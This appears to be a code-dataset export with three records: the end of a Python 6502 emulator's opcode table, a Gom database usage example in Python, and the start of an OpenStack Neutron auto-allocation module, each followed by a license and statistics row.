self.instruction_lookup[0x9A] = instructions.SingleByteInstruction(self.clocks, self.pc_state, self.pc_state.X, self.pc_state.S, self.instruction_exe.TNoStatus_exec)
self.instruction_lookup[0xBA] = instructions.SingleByteInstruction(self.clocks, self.pc_state, self.pc_state.S, self.pc_state.X, self.instruction_exe.TNoStatus_exec)
self.instruction_lookup[0x8A] = instructions.SingleByteInstruction(self.clocks, self.pc_state, self.pc_state.X, self.pc_state.A, self.instruction_exe.TStatus_exec)
self.instruction_lookup[0xAA] = instructions.SingleByteInstruction(self.clocks, self.pc_state, self.pc_state.A, self.pc_state.X, self.instruction_exe.TStatus_exec)
self.instruction_lookup[0xA8] = instructions.SingleByteInstruction(self.clocks, self.pc_state, self.pc_state.A, self.pc_state.Y, self.instruction_exe.TStatus_exec)
self.instruction_lookup[0x98] = instructions.SingleByteInstruction(self.clocks, self.pc_state, self.pc_state.Y, self.pc_state.A, self.instruction_exe.TStatus_exec)
# ADC
self.instruction_lookup[0x61] = instructions.ReadWriteInstruction(self.clocks, self.pc_state, self.aIZX, self.r, self.nullW, self.instruction_exe.ADC_exec)
self.instruction_lookup[0x69] = instructions.ReadWriteInstruction(self.clocks, self.pc_state, self.aIMM, self.r, self.nullW, self.instruction_exe.ADC_exec)
self.instruction_lookup[0x65] = instructions.ReadWriteInstruction(self.clocks, self.pc_state, self.aZP, self.r, self.nullW, self.instruction_exe.ADC_exec)
self.instruction_lookup[0x75] = instructions.ReadWriteInstruction(self.clocks, self.pc_state, self.aZPX, self.r, self.nullW, self.instruction_exe.ADC_exec)
self.instruction_lookup[0x71] = instructions.ReadWriteInstruction(self.clocks, self.pc_state, self.aIZY, self.r, self.nullW, self.instruction_exe.ADC_exec)
self.instruction_lookup[0x6D] = instructions.ReadWriteInstruction(self.clocks, self.pc_state, self.aAbs, self.r, self.nullW, self.instruction_exe.ADC_exec)
self.instruction_lookup[0x7D] = instructions.ReadWriteInstruction(self.clocks, self.pc_state, self.aAbx, self.r, self.nullW, self.instruction_exe.ADC_exec)
self.instruction_lookup[0x79] = instructions.ReadWriteInstruction(self.clocks, self.pc_state, self.aAby, self.r, self.nullW, self.instruction_exe.ADC_exec)
# ASL
self.instruction_lookup[0x06] = instructions.ReadWriteInstruction(self.clocks, self.pc_state, self.aZP, self.r, self.w, self.instruction_exe.ASL_exec)
self.instruction_lookup[0x16] = instructions.ReadWriteInstruction(self.clocks, self.pc_state, self.aZPX, self.r, self.w, self.instruction_exe.ASL_exec)
self.instruction_lookup[0x0E] = instructions.ReadWriteInstruction(self.clocks, self.pc_state, self.aAbs, self.r, self.w, self.instruction_exe.ASL_exec)
self.instruction_lookup[0x1E] = instructions.ReadWriteInstruction(self.clocks, self.pc_state, self.aAbx, self.r, self.w, self.instruction_exe.ASL_exec)
# AND
self.instruction_lookup[0x21] = instructions.ReadWriteInstruction(self.clocks, self.pc_state, self.aIZX, self.r, self.nullW, self.instruction_exe.AND_exec)
self.instruction_lookup[0x29] = instructions.ReadWriteInstruction(self.clocks, self.pc_state, self.aIMM, self.r, self.nullW, self.instruction_exe.AND_exec)
self.instruction_lookup[0x25] = instructions.ReadWriteInstruction(self.clocks, self.pc_state, self.aZP, self.r, self.nullW, self.instruction_exe.AND_exec)
self.instruction_lookup[0x35] = instructions.ReadWriteInstruction(self.clocks, self.pc_state, self.aZPX, self.r, self.nullW, self.instruction_exe.AND_exec)
self.instruction_lookup[0x31] = instructions.ReadWriteInstruction(self.clocks, self.pc_state, self.aIZY, self.r, self.nullW, self.instruction_exe.AND_exec)
self.instruction_lookup[0x2D] = instructions.ReadWriteInstruction(self.clocks, self.pc_state, self.aAbs, self.r, self.nullW, self.instruction_exe.AND_exec)
self.instruction_lookup[0x3D] = instructions.ReadWriteInstruction(self.clocks, self.pc_state, self.aAbx, self.r, self.nullW, self.instruction_exe.AND_exec)
self.instruction_lookup[0x39] = instructions.ReadWriteInstruction(self.clocks, self.pc_state, self.aAby, self.r, self.nullW, self.instruction_exe.AND_exec)
# BIT
self.instruction_lookup[0x24] = instructions.ReadWriteInstruction(self.clocks, self.pc_state, self.aZP, self.r, self.nullW, self.instruction_exe.BIT_exec)
self.instruction_lookup[0x2C] = instructions.ReadWriteInstruction(self.clocks, self.pc_state, self.aAbs, self.r, self.nullW, self.instruction_exe.BIT_exec)
# CMP
self.instruction_lookup[0xC1] = instructions.ReadWriteInstruction(self.clocks, self.pc_state, self.aIZX, self.r, self.nullW, self.instruction_exe.CMP_exec)
self.instruction_lookup[0xC9] = instructions.ReadWriteInstruction(self.clocks, self.pc_state, self.aIMM, self.r, self.nullW, self.instruction_exe.CMP_exec)
self.instruction_lookup[0xC5] = instructions.ReadWriteInstruction(self.clocks, self.pc_state, self.aZP, self.r, self.nullW, self.instruction_exe.CMP_exec)
self.instruction_lookup[0xD5] = instructions.ReadWriteInstruction(self.clocks, self.pc_state, self.aZPX, self.r, self.nullW, self.instruction_exe.CMP_exec)
self.instruction_lookup[0xD1] = instructions.ReadWriteInstruction(self.clocks, self.pc_state, self.aIZY, self.r, self.nullW, self.instruction_exe.CMP_exec)
self.instruction_lookup[0xCD] = instructions.ReadWriteInstruction(self.clocks, self.pc_state, self.aAbs, self.r, self.nullW, self.instruction_exe.CMP_exec)
self.instruction_lookup[0xDD] = instructions.ReadWriteInstruction(self.clocks, self.pc_state, self.aAbx, self.r, self.nullW, self.instruction_exe.CMP_exec)
self.instruction_lookup[0xD9] = instructions.ReadWriteInstruction(self.clocks, self.pc_state, self.aAby, self.r, self.nullW, self.instruction_exe.CMP_exec)
# CPX
self.instruction_lookup[0xE0] = instructions.ReadWriteInstruction(self.clocks, self.pc_state, self.aIMM, self.r, self.nullW, self.instruction_exe.CPX_exec)
self.instruction_lookup[0xE4] = instructions.ReadWriteInstruction(self.clocks, self.pc_state, self.aZP, self.r, self.nullW, self.instruction_exe.CPX_exec)
self.instruction_lookup[0xEC] = instructions.ReadWriteInstruction(self.clocks, self.pc_state, self.aAbs, self.r, self.nullW, self.instruction_exe.CPX_exec)
# CPY
self.instruction_lookup[0xC0] = instructions.ReadWriteInstruction(self.clocks, self.pc_state, self.aIMM, self.r, self.nullW, self.instruction_exe.CPY_exec)
self.instruction_lookup[0xC4] = instructions.ReadWriteInstruction(self.clocks, self.pc_state, self.aZP, self.r, self.nullW, self.instruction_exe.CPY_exec)
self.instruction_lookup[0xCC] = instructions.ReadWriteInstruction(self.clocks, self.pc_state, self.aAbs, self.r, self.nullW, self.instruction_exe.CPY_exec)
# DEC
self.instruction_lookup[0xC6] = instructions.ReadWriteInstruction(self.clocks, self.pc_state, self.aZP, self.r, self.w, self.instruction_exe.DEC_exec)
self.instruction_lookup[0xD6] = instructions.ReadWriteInstruction(self.clocks, self.pc_state, self.aZPX, self.r, self.w, self.instruction_exe.DEC_exec)
self.instruction_lookup[0xCE] = instructions.ReadWriteInstruction(self.clocks, self.pc_state, self.aAbs, self.r, self.w, self.instruction_exe.DEC_exec)
self.instruction_lookup[0xDE] = instructions.ReadWriteInstruction(self.clocks, self.pc_state, self.aAbx, self.r, self.w, self.instruction_exe.DEC_exec)
# EOR
self.instruction_lookup[0x41] = instructions.ReadWriteInstruction(self.clocks, self.pc_state, self.aIZX, self.r, self.nullW, self.instruction_exe.EOR_exec)
self.instruction_lookup[0x49] = instructions.ReadWriteInstruction(self.clocks, self.pc_state, self.aIMM, self.r, self.nullW, self.instruction_exe.EOR_exec)
self.instruction_lookup[0x45] = instructions.ReadWriteInstruction(self.clocks, self.pc_state, self.aZP, self.r, self.nullW, self.instruction_exe.EOR_exec)
self.instruction_lookup[0x55] = instructions.ReadWriteInstruction(self.clocks, self.pc_state, self.aZPX, self.r, self.nullW, self.instruction_exe.EOR_exec)
self.instruction_lookup[0x51] = instructions.ReadWriteInstruction(self.clocks, self.pc_state, self.aIZY, self.r, self.nullW, self.instruction_exe.EOR_exec)
self.instruction_lookup[0x4D] = instructions.ReadWriteInstruction(self.clocks, self.pc_state, self.aAbs, self.r, self.nullW, self.instruction_exe.EOR_exec)
self.instruction_lookup[0x5D] = instructions.ReadWriteInstruction(self.clocks, self.pc_state, self.aAbx, self.r, self.nullW, self.instruction_exe.EOR_exec)
self.instruction_lookup[0x59] = instructions.ReadWriteInstruction(self.clocks, self.pc_state, self.aAby, self.r, self.nullW, self.instruction_exe.EOR_exec)
# INC
self.instruction_lookup[0xE6] = instructions.ReadWriteInstruction(self.clocks, self.pc_state, self.aZP, self.r, self.w, self.instruction_exe.INC_exec)
self.instruction_lookup[0xF6] = instructions.ReadWriteInstruction(self.clocks, self.pc_state, self.aZPX, self.r, self.w, self.instruction_exe.INC_exec)
self.instruction_lookup[0xEE] = instructions.ReadWriteInstruction(self.clocks, self.pc_state, self.aAbs, self.r, self.w, self.instruction_exe.INC_exec)
self.instruction_lookup[0xFE] = instructions.ReadWriteInstruction(self.clocks, self.pc_state, self.aAbx, self.r, self.w, self.instruction_exe.INC_exec)
# LDA
self.instruction_lookup[0xA1] = instructions.ReadWriteInstruction(self.clocks, self.pc_state, self.aIZX, self.r, self.nullW, self.instruction_exe.LDA_exec)
self.instruction_lookup[0xA9] = instructions.ReadWriteInstruction(self.clocks, self.pc_state, self.aIMM, self.r, self.nullW, self.instruction_exe.LDA_exec)
self.instruction_lookup[0xA5] = instructions.ReadWriteInstruction(self.clocks, self.pc_state, self.aZP, self.r, self.nullW, self.instruction_exe.LDA_exec)
self.instruction_lookup[0xB5] = instructions.ReadWriteInstruction(self.clocks, self.pc_state, self.aZPX, self.r, self.nullW, self.instruction_exe.LDA_exec)
self.instruction_lookup[0xB1] = instructions.ReadWriteInstruction(self.clocks, self.pc_state, self.aIZY, self.r, self.nullW, self.instruction_exe.LDA_exec)
self.instruction_lookup[0xAD] = instructions.ReadWriteInstruction(self.clocks, self.pc_state, self.aAbs, self.r, self.nullW, self.instruction_exe.LDA_exec)
self.instruction_lookup[0xBD] = instructions.ReadWriteInstruction(self.clocks, self.pc_state, self.aAbx, self.r, self.nullW, self.instruction_exe.LDA_exec)
self.instruction_lookup[0xB9] = instructions.ReadWriteInstruction(self.clocks, self.pc_state, self.aAby, self.r, self.nullW, self.instruction_exe.LDA_exec)
# LDX
self.instruction_lookup[0xA2] = instructions.ReadWriteInstruction(self.clocks, self.pc_state, self.aIMM, self.r, self.nullW, self.instruction_exe.LDX_exec)
self.instruction_lookup[0xA6] = instructions.ReadWriteInstruction(self.clocks, self.pc_state, self.aZP, self.r, self.nullW, self.instruction_exe.LDX_exec)
self.instruction_lookup[0xB6] = instructions.ReadWriteInstruction(self.clocks, self.pc_state, self.aZPY, self.r, self.nullW, self.instruction_exe.LDX_exec)
self.instruction_lookup[0xAE] = instructions.ReadWriteInstruction(self.clocks, self.pc_state, self.aAbs, self.r, self.nullW, self.instruction_exe.LDX_exec)
self.instruction_lookup[0xBE] = instructions.ReadWriteInstruction(self.clocks, self.pc_state, self.aAby, self.r, self.nullW, self.instruction_exe.LDX_exec)
# LDY
self.instruction_lookup[0xA0] = instructions.ReadWriteInstruction(self.clocks, self.pc_state, self.aIMM, self.r, self.nullW, self.instruction_exe.LDY_exec)
self.instruction_lookup[0xA4] = instructions.ReadWriteInstruction(self.clocks, self.pc_state, self.aZP, self.r, self.nullW, self.instruction_exe.LDY_exec)
self.instruction_lookup[0xB4] = instructions.ReadWriteInstruction(self.clocks, self.pc_state, self.aZPX, self.r, self.nullW, self.instruction_exe.LDY_exec)
self.instruction_lookup[0xAC] = instructions.ReadWriteInstruction(self.clocks, self.pc_state, self.aAbs, self.r, self.nullW, self.instruction_exe.LDY_exec)
self.instruction_lookup[0xBC] = instructions.ReadWriteInstruction(self.clocks, self.pc_state, self.aAbx, self.r, self.nullW, self.instruction_exe.LDY_exec)
# LSR
self.instruction_lookup[0x46] = instructions.ReadWriteInstruction(self.clocks, self.pc_state, self.aZP, self.r, self.w, self.instruction_exe.LSR_exec)
self.instruction_lookup[0x56] = instructions.ReadWriteInstruction(self.clocks, self.pc_state, self.aZPX, self.r, self.w, self.instruction_exe.LSR_exec)
self.instruction_lookup[0x4E] = instructions.ReadWriteInstruction(self.clocks, self.pc_state, self.aAbs, self.r, self.w, self.instruction_exe.LSR_exec)
self.instruction_lookup[0x5E] = instructions.ReadWriteInstruction(self.clocks, self.pc_state, self.aAbx, self.r, self.w, self.instruction_exe.LSR_exec)
# OR
self.instruction_lookup[0x01] = instructions.ReadWriteInstruction(self.clocks, self.pc_state, self.aIZX, self.r, self.nullW, self.instruction_exe.OR_exec)
self.instruction_lookup[0x09] = instructions.ReadWriteInstruction(self.clocks, self.pc_state, self.aIMM, self.r, self.nullW, self.instruction_exe.OR_exec)
self.instruction_lookup[0x05] = instructions.ReadWriteInstruction(self.clocks, self.pc_state, self.aZP, self.r, self.nullW, self.instruction_exe.OR_exec)
self.instruction_lookup[0x15] = instructions.ReadWriteInstruction(self.clocks, self.pc_state, self.aZPX, self.r, self.nullW, self.instruction_exe.OR_exec)
self.instruction_lookup[0x11] = instructions.ReadWriteInstruction(self.clocks, self.pc_state, self.aIZY, self.r, self.nullW, self.instruction_exe.OR_exec)
self.instruction_lookup[0x0D] = instructions.ReadWriteInstruction(self.clocks, self.pc_state, self.aAbs, self.r, self.nullW, self.instruction_exe.OR_exec)
self.instruction_lookup[0x1D] = instructions.ReadWriteInstruction(self.clocks, self.pc_state, self.aAbx, self.r, self.nullW, self.instruction_exe.OR_exec)
self.instruction_lookup[0x19] = instructions.ReadWriteInstruction(self.clocks, self.pc_state, self.aAby, self.r, self.nullW, self.instruction_exe.OR_exec)
# ROL
self.instruction_lookup[0x26] = instructions.ReadWriteInstruction(self.clocks, self.pc_state, self.aZP, self.r, self.w, self.instruction_exe.ROL_exec)
self.instruction_lookup[0x36] = instructions.ReadWriteInstruction(self.clocks, self.pc_state, self.aZPX, self.r, self.w, self.instruction_exe.ROL_exec)
self.instruction_lookup[0x2E] = instructions.ReadWriteInstruction(self.clocks, self.pc_state, self.aAbs, self.r, self.w, self.instruction_exe.ROL_exec)
self.instruction_lookup[0x3E] = instructions.ReadWriteInstruction(self.clocks, self.pc_state, self.aAbx, self.r, self.w, self.instruction_exe.ROL_exec)
self.instruction_lookup[0x2A] = instructions.ReadWriteInstruction(self.clocks, self.pc_state, self.aAcc, self.aR, self.aW, self.instruction_exe.ROL_exec)
# ROR
self.instruction_lookup[0x66] = instructions.ReadWriteInstruction(self.clocks, self.pc_state, self.aZP, self.r, self.w, self.instruction_exe.ROR_exec)
self.instruction_lookup[0x76] = instructions.ReadWriteInstruction(self.clocks, self.pc_state, self.aZPX, self.r, self.w, self.instruction_exe.ROR_exec)
self.instruction_lookup[0x6E] = instructions.ReadWriteInstruction(self.clocks, self.pc_state, self.aAbs, self.r, self.w, self.instruction_exe.ROR_exec)
self.instruction_lookup[0x7E] = instructions.ReadWriteInstruction(self.clocks, self.pc_state, self.aAbx, self.r, self.w, self.instruction_exe.ROR_exec)
self.instruction_lookup[0x6A] = instructions.ReadWriteInstruction(self.clocks, self.pc_state, self.aAcc, self.aR, self.aW, self.instruction_exe.ROR_exec)
# SBC
self.instruction_lookup[0xE1] = instructions.ReadWriteInstruction(self.clocks, self.pc_state, self.aIZX, self.r, self.nullW, self.instruction_exe.SBC_exec)
self.instruction_lookup[0xE9] = instructions.ReadWriteInstruction(self.clocks, self.pc_state, self.aIMM, self.r, self.nullW, self.instruction_exe.SBC_exec)
self.instruction_lookup[0xE5] = instructions.ReadWriteInstruction(self.clocks, self.pc_state, self.aZP, self.r, self.nullW, self.instruction_exe.SBC_exec)
self.instruction_lookup[0xF5] = instructions.ReadWriteInstruction(self.clocks, self.pc_state, self.aZPX, self.r, self.nullW, self.instruction_exe.SBC_exec)
self.instruction_lookup[0xF1] = instructions.ReadWriteInstruction(self.clocks, self.pc_state, self.aIZY, self.r, self.nullW, self.instruction_exe.SBC_exec)
self.instruction_lookup[0xED] = instructions.ReadWriteInstruction(self.clocks, self.pc_state, self.aAbs, self.r, self.nullW, self.instruction_exe.SBC_exec)
self.instruction_lookup[0xFD] = instructions.ReadWriteInstruction(self.clocks, self.pc_state, self.aAbx, self.r, self.nullW, self.instruction_exe.SBC_exec)
self.instruction_lookup[0xF9] = instructions.ReadWriteInstruction(self.clocks, self.pc_state, self.aAby, self.r, self.nullW, self.instruction_exe.SBC_exec)
# STA
self.instruction_lookup[0x81] = instructions.ReadWriteInstruction(self.clocks, self.pc_state, self.aIZX, self.nullR, self.regW, self.instruction_exe.STA_exec)
self.instruction_lookup[0x85] = instructions.ReadWriteInstruction(self.clocks, self.pc_state, self.aZP, self.nullR, self.regW, self.instruction_exe.STA_exec)
self.instruction_lookup[0x95] = instructions.ReadWriteInstruction(self.clocks, self.pc_state, self.aZPX, self.nullR, self.regW, self.instruction_exe.STA_exec)
self.instruction_lookup[0x91] = instructions.ReadWriteInstruction(self.clocks, self.pc_state, self.aIZY, self.nullR, self.regW, self.instruction_exe.STA_exec, self.pc_state.CYCLES_TO_CLOCK)
self.instruction_lookup[0x8D] = instructions.ReadWriteInstruction(self.clocks, self.pc_state, self.aAbs, self.nullR, self.regW, self.instruction_exe.STA_exec)
self.instruction_lookup[0x9D] = instructions.ReadWriteInstruction(self.clocks, self.pc_state, self.aAbx, self.nullR, self.regW, self.instruction_exe.STA_exec, self.pc_state.CYCLES_TO_CLOCK)
self.instruction_lookup[0x99] = instructions.ReadWriteInstruction(self.clocks, self.pc_state, self.aAby, self.nullR, self.regW, self.instruction_exe.STA_exec, self.pc_state.CYCLES_TO_CLOCK)
# SAX
self.instruction_lookup[0x83] = instructions.ReadWriteInstruction(self.clocks, self.pc_state, self.aIZX, self.nullR, self.regW, self.instruction_exe.SAX_exec)
self.instruction_lookup[0x87] = instructions.ReadWriteInstruction(self.clocks, self.pc_state, self.aZP, self.nullR, self.regW, self.instruction_exe.SAX_exec)
self.instruction_lookup[0x8F] = instructions.ReadWriteInstruction(self.clocks, self.pc_state, self.aAbs, self.nullR, self.regW, self.instruction_exe.SAX_exec)
self.instruction_lookup[0x97] = instructions.ReadWriteInstruction(self.clocks, self.pc_state, self.aZPY, self.nullR, self.regW, self.instruction_exe.SAX_exec)
# STX
self.instruction_lookup[0x86] = instructions.ReadWriteInstruction(self.clocks, self.pc_state, self.aZP, self.nullR, self.regW, self.instruction_exe.STX_exec)
self.instruction_lookup[0x96] = instructions.ReadWriteInstruction(self.clocks, self.pc_state, self.aZPY, self.nullR, self.regW, self.instruction_exe.STX_exec)
self.instruction_lookup[0x8E] = instructions.ReadWriteInstruction(self.clocks, self.pc_state, self.aAbs, self.nullR, self.regW, self.instruction_exe.STX_exec)
# STY
self.instruction_lookup[0x84] = instructions.ReadWriteInstruction(self.clocks, self.pc_state, self.aZP, self.nullR, self.regW, self.instruction_exe.STY_exec)
self.instruction_lookup[0x94] = instructions.ReadWriteInstruction(self.clocks, self.pc_state, self.aZPX, self.nullR, self.regW, self.instruction_exe.STY_exec)
self.instruction_lookup[0x8C] = instructions.ReadWriteInstruction(self.clocks, self.pc_state, self.aAbs, self.nullR, self.regW, self.instruction_exe.STY_exec)
# DCP
self.instruction_lookup[0xC3] = instructions.ReadWriteInstruction(self.clocks, self.pc_state, self.aIZX, self.r, self.w, self.instruction_exe.DCP_exec)
self.instruction_lookup[0xC7] = instructions.ReadWriteInstruction(self.clocks, self.pc_state, self.aZP, self.r, self.w, self.instruction_exe.DCP_exec)
self.instruction_lookup[0xD7] = instructions.ReadWriteInstruction(self.clocks, self.pc_state, self.aZPX, self.r, self.w, self.instruction_exe.DCP_exec)
self.instruction_lookup[0xD3] = instructions.ReadWriteInstruction(self.clocks, self.pc_state, self.aIZY, self.r, self.w, self.instruction_exe.DCP_exec)
self.instruction_lookup[0xCF] = instructions.ReadWriteInstruction(self.clocks, self.pc_state, self.aAbs, self.r, self.w, self.instruction_exe.DCP_exec)
self.instruction_lookup[0xDF] = instructions.ReadWriteInstruction(self.clocks, self.pc_state, self.aAbx, self.r, self.w, self.instruction_exe.DCP_exec)
self.instruction_lookup[0xDB] = instructions.ReadWriteInstruction(self.clocks, self.pc_state, self.aAby, self.r, self.w, self.instruction_exe.DCP_exec)
# JSR
self.instruction_lookup[0x20] = instructions.JumpSubRoutineInstruction(self.clocks, self.pc_state, self.memory, None)
# Barnch
# BPL case 0x10: if (self.pc_state.P.status.N == 0)
self.instruction_lookup[0x10] = instructions.BranchInstruction(self.clocks, self.pc_state, self.memory, 0x80, 0x00, None)
# BMI case 0x30: if (self.pc_state.P.status.N == 1)
self.instruction_lookup[0x30] = instructions.BranchInstruction(self.clocks, self.pc_state, self.memory, 0x80, 0x80, None)
# BVC case 0x50: if (self.pc_state.P.status.V == 0)
self.instruction_lookup[0x50] = instructions.BranchInstruction(self.clocks, self.pc_state, self.memory, 0x40, 0x00, None)
# BVS case 0x70: if (self.pc_state.P.status.V == 1)
self.instruction_lookup[0x70] = instructions.BranchInstruction(self.clocks, self.pc_state, self.memory, 0x40, 0x40, None)
# BCC case 0x90: if (self.pc_state.P.status.C == 0)
self.instruction_lookup[0x90] = instructions.BranchInstruction(self.clocks, self.pc_state, self.memory, 0x01, 0x00, None)
# BCS case 0xB0: if (self.pc_state.P.status.C == 1)
self.instruction_lookup[0xB0] = instructions.BranchInstruction(self.clocks, self.pc_state, self.memory, 0x01, 0x01, None)
# BNE case 0xD0: self.clocks += 2*CYCLES_TO_CLOCK if (self.pc_state.P.status.Z == 0)
self.instruction_lookup[0xD0] = instructions.BranchInstruction(self.clocks, self.pc_state, self.memory, 0x02, 0x00, None)
# BEO case 0xF0: if (self.pc_state.P.status.Z == 1)
self.instruction_lookup[0xF0] = instructions.BranchInstruction(self.clocks, self.pc_state, self.memory, 0x02, 0x02, None)
self.instruction_lookup[0x40] = instructions.ReturnFromInterrupt(self.clocks, self.pc_state, self.memory, None)
# RTS
self.instruction_lookup[0x60] = instructions.ReturnFromSubRoutineInstruction(self.clocks, self.pc_state, self.memory, None)
# JMP, absolute (effectively immediate)
self.instruction_lookup[0x4C] = instructions.JumpInstruction(self.clocks, self.pc_state, self.aAbs, None)
# JMP, indirect (effectively absolute)
self.instruction_lookup[0x6C] = instructions.JumpInstruction(self.clocks, self.pc_state, self.aInd, None)
# PHP
self.instruction_lookup[0x08] = instructions.PHPInstruction(self.clocks, self.pc_state, self.memory, None)
# PLP
self.instruction_lookup[0x28] = instructions.PLPInstruction(self.clocks, self.pc_state, self.memory, None)
# PHA
self.instruction_lookup[0x48] = instructions.PHAInstruction(self.clocks, self.pc_state, self.memory, None)
# PLA
self.instruction_lookup[0x68] = instructions.PLAInstruction(self.clocks, self.pc_state, self.memory, None)
# Illigal instructions
# SLO
self.instruction_lookup[0x07] = instructions.ReadWriteInstruction(self.clocks, self.pc_state, self.aZP, self.r, self.nullW, self.instruction_exe.SLO_exec)
# Undocumented instructions
self.instruction_lookup[0x04] = instructions.ReadWriteInstruction(self.clocks, self.pc_state, self.aZP, self.nullR, self.regW, self.instruction_exe.NOP_exec)
self.instruction_lookup[0x14] = instructions.ReadWriteInstruction(self.clocks, self.pc_state, self.aZPX, self.nullR, self.regW, self.instruction_exe.NOP_exec)
self.instruction_lookup[0x34] = instructions.ReadWriteInstruction(self.clocks, self.pc_state, self.aZPX, self.nullR, self.regW, self.instruction_exe.NOP_exec)
self.instruction_lookup[0x44] = instructions.ReadWriteInstruction(self.clocks, self.pc_state, self.aZP, self.nullR, self.regW, self.instruction_exe.NOP_exec)
self.instruction_lookup[0x54] = instructions.ReadWriteInstruction(self.clocks, self.pc_state, self.aZPX, self.nullR, self.regW, self.instruction_exe.NOP_exec)
self.instruction_lookup[0x64] = instructions.ReadWriteInstruction(self.clocks, self.pc_state, self.aZP, self.nullR, self.regW, self.instruction_exe.NOP_exec)
self.instruction_lookup[0x74] = instructions.ReadWriteInstruction(self.clocks, self.pc_state, self.aZPX, self.nullR, self.regW, self.instruction_exe.NOP_exec)
self.instruction_lookup[0x80] = instructions.ReadWriteInstruction(self.clocks, self.pc_state, self.aIMM, self.nullR, self.regW, self.instruction_exe.NOP_exec)
self.instruction_lookup[0x82] = instructions.ReadWriteInstruction(self.clocks, self.pc_state, self.aIMM, self.nullR, self.regW, self.instruction_exe.NOP_exec)
self.instruction_lookup[0x89] = instructions.ReadWriteInstruction(self.clocks, self.pc_state, self.aIMM, self.nullR, self.regW, self.instruction_exe.NOP_exec)
self.instruction_lookup[0xC2] = instructions.ReadWriteInstruction(self.clocks, self.pc_state, self.aIMM, self.nullR, self.regW, self.instruction_exe.NOP_exec)
self.instruction_lookup[0xD4] = instructions.ReadWriteInstruction(self.clocks, self.pc_state, self.aZPX, self.nullR, self.regW, self.instruction_exe.NOP_exec)
self.instruction_lookup[0xE2] = instructions.ReadWriteInstruction(self.clocks, self.pc_state, self.aIMM, self.nullR, self.regW, self.instruction_exe.NOP_exec)
self.instruction_lookup[0xF4] = instructions.ReadWriteInstruction(self.clocks, self.pc_state, self.aZPX, self.nullR, self.regW, self.instruction_exe.NOP_exec)
# LAX
self.instruction_lookup[0xA7] = instructions.ReadWriteInstruction(self.clocks, self.pc_state, self.aZP, self.r, self.nullW, self.instruction_exe.LAX_exec)
self.instruction_lookup[0xB7] = instructions.ReadWriteInstruction(self.clocks, self.pc_state, self.aZPY, self.r, self.nullW, self.instruction_exe.LAX_exec)
self.instruction_lookup[0xAF] = instructions.ReadWriteInstruction(self.clocks, self.pc_state, self.aAbs, self.r, self.nullW, self.instruction_exe.LAX_exec)
self.instruction_lookup[0xBF] = instructions.ReadWriteInstruction(self.clocks, self.pc_state, self.aAby, self.r, self.nullW, self.instruction_exe.LAX_exec)
self.instruction_lookup[0xA3] = instructions.ReadWriteInstruction(self.clocks, self.pc_state, self.aIZX, self.r, self.nullW, self.instruction_exe.LAX_exec)
self.instruction_lookup[0xB3] = instructions.ReadWriteInstruction(self.clocks, self.pc_state, self.aIZY, self.r, self.nullW, self.instruction_exe.LAX_exec)
# ASR
self.instruction_lookup[0x4B] = instructions.ReadWriteInstruction(self.clocks, self.pc_state, self.aIMM, self.r, self.nullW, self.instruction_exe.ASR_exec)
# SBX
self.instruction_lookup[0xCB] = instructions.ReadWriteInstruction(self.clocks, self.pc_state, self.aIMM, self.r, self.nullW, self.instruction_exe.SBX_exec)
|
mit
| -1,423,468,789,650,102,000
| 94.933333
| 197
| 0.734132
| false
| 3.081096
| false
| false
| false
|
GNOME/gom
|
examples/gom.py
|
1
|
2292
|
#!/usr/bin/python3
from gi.types import GObjectMeta
from gi.repository import GLib
from gi.repository import GObject
from gi.repository import Gom
# Need a metaclass until we get something like _gclass_init_
# https://bugzilla.gnome.org/show_bug.cgi?id=701843
class ItemResourceMeta(GObjectMeta):
def __init__(cls, name, bases, dct):
super(ItemResourceMeta, cls).__init__(name, bases, dct)
cls.set_table("items")
cls.set_primary_key("id")
cls.set_notnull("name")
class ItemResource(Gom.Resource, metaclass=ItemResourceMeta):
id = GObject.Property(type=int)
name = GObject.Property(type=str)
if __name__ == '__main__':
# Connect to the database
adapter = Gom.Adapter()
adapter.open_sync(":memory:")
# Create the table
repository = Gom.Repository(adapter=adapter)
repository.automatic_migrate_sync(1, [ItemResource])
# Insert an item
item = ItemResource(repository=repository, name="item1")
item.save_sync()
# Fetch the item back
item = repository.find_one_sync(ItemResource, None)
assert item.id == 1
assert item.name == 'item1'
# Insert a new item
item = ItemResource(repository=repository, name="item2")
item.save_sync()
# Fetch them all with a None filter, ordered by name
names = ['item2', 'item1']
sorting = Gom.Sorting(ItemResource, "name", Gom.SortingMode.DESCENDING)
group = repository.find_sorted_sync(ItemResource, None, sorting)
count = len(group)
assert count == 2
group.fetch_sync(0, count)
for i, item in enumerate(group):
assert item.name == names[i]
# Fetch only one of them with a filter, asynchronously
loop = GLib.MainLoop()
def fetch_cb(group, result, user_data):
group.fetch_finish(result)
item = group[0]
assert item.name == "item2"
# Close the database
adapter.close_sync()
loop.quit()
def find_cb(repository, result, user_data):
group = repository.find_finish(result)
count = len(group)
assert count == 1
group.fetch_async(0, count, fetch_cb, None)
filter = Gom.Filter.new_eq(ItemResource, "name", "item2")
group = repository.find_async(ItemResource, filter, find_cb, None)
loop.run()
|
lgpl-2.1
| -4,386,300,202,051,084,300
| 26.614458
| 75
| 0.654014
| false
| 3.603774
| false
| false
| false
|
eayunstack/neutron
|
neutron/services/auto_allocate/db.py
|
1
|
16534
|
# Copyright 2015-2016 Hewlett Packard Enterprise Development Company, LP
#
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from neutron_lib.api.definitions import network as net_def
from neutron_lib.callbacks import events
from neutron_lib.callbacks import registry
from neutron_lib.callbacks import resources
from neutron_lib import exceptions as n_exc
from neutron_lib.objects import exceptions as obj_exc
from neutron_lib.plugins import constants
from neutron_lib.plugins import directory
from oslo_log import log as logging
from neutron._i18n import _
from neutron.common import exceptions as c_exc
from neutron.db import _resource_extend as resource_extend
from neutron.db import _utils as db_utils
from neutron.db import api as db_api
from neutron.db import common_db_mixin
from neutron.extensions import l3
from neutron.objects import auto_allocate as auto_allocate_obj
from neutron.objects import base as base_obj
from neutron.objects import network as net_obj
from neutron.plugins.common import utils as p_utils
from neutron.services.auto_allocate import exceptions
LOG = logging.getLogger(__name__)
IS_DEFAULT = 'is_default'
CHECK_REQUIREMENTS = 'dry-run'
@db_api.retry_if_session_inactive()
def _ensure_external_network_default_value_callback(
